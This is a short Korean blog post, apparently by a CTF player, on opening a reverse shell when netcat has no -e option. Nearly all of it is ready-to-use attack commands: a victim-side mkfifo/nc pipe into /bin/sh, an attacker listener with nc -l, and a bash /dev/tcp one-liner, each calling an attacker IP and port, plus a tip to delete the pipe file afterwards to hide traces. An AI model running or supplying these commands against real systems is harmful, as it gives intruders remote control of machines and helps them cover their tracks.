몇몇 라이트업들을 보니 "nc -e /bin/sh IP PORT" 등으로 리버스텔넷을 하는 경우가 있다.

근데, 난 안됀다... e옵션이 없다.

그래서 찾아본 다른 방법


victim

system("mkfifo /tmp/tunz; nc IP PORT 0< /tmp/tunz | /bin/sh 1> /tmp/tunz")


attacker

$ nc -l -p PORT -vvv


(단, 접속후 큐파일, /tmp/tunz은 꼭 지우도록 한다.)



추가)


/bin/bash -i >& /dev/tcp/IP/PORT 0>&1


/dev/tcp 가 있으면 그냥, 저기에 IP,PORT만 써넣으면 됌

posted by tunz